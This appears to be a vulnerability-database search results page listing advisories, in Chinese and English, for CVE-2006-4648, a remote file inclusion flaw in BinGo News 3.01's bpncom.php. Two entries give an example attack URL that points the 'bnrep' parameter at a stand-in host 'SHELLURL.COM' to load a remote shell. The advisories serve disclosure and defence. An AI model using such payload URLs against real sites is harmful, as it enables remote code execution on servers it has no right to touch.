6 matches found
BinGo News <= 3.01 (bnrep) Remote File Include Vulnerability
在文件bpncom.php中,未对包含对象参数bnrep做过滤导致远程文件包含漏洞,代码如下 include $bnrep."bnconfigs.php"; 可导致远程文件包含如下: http://example.com/path/bpncom.php?bnrep=http://SHELLURL.COM...
Bingo News BP_ncom.PHP远程文件包含漏洞
BinGoPHP是一款基于PHP的WEB应用程序。 BinGoPHP不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是由于'BPncom.PHP'脚本对用户提交的'bnrep'参数缺少过滤,提交恶意的远程服务器作为包含对象,可导致以WEB进程权限执行任意PHP代码。 BinGoPHP BinGoPHP 3.01 http://bingophp.free.fr/ http://www.example.com/Script Path/bpncom.php?bnrep=http://SHELLURL.COM?...
CVE-2006-4648
PHP remote file inclusion vulnerability in bpncom.php in BinGo News BP News 3.01 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the bnrep parameter...
BinGo.txt
============================================================================================== BinGo News = v3.01 bnrep Remote File Inclusion Exploit =============================================================================================== Critical Level : Dangerous Venedor site :...
BinGo News <= 3.01 (bnrep) Remote File Include Vulnerability
No description provided by source. ============================================================================================== BinGo News = v3.01 bnrep Remote File Inclusion Exploit =============================================================================================== Critical Level :...
BinGo News <= v3.01 (bnrep) Remote File Inclusion Exploit
============================================================================================== BinGo News = v3.01 bnrep Remote File Inclusion Exploit =============================================================================================== Critical Level : Dangerous Venedor site :...